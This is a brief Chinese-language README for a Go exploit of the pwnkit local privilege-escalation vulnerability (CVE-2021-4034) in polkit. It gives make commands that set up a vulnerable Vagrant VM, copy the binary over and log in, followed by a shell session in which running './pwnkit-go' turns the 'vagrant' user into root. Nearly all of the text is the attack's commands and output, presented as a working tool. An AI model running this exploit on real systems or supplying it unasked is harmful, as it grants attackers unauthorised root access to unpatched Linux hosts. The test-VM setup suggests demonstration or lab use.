这是一个针对 pwnkit 漏洞(CVE-2021-4034)的有效利用程序,使用 Go 语言编写
试试看:
# 创建一个存在漏洞的 vagrant 虚拟机
$ make vm
...
# 构建二进制文件并通过 scp 传输到 vagrant 虚拟机
$ make scp
# 通过 ssh 登录到 vagrant 虚拟机
$ make ssh
# 默认用户是 "vagrant"
vagrant@ubuntu-focal:~$ whoami
vagrant
# 执行利用程序
vagrant@ubuntu-focal:/tmp$ cd /tmp && ./pwnkit-go
$ whoami
root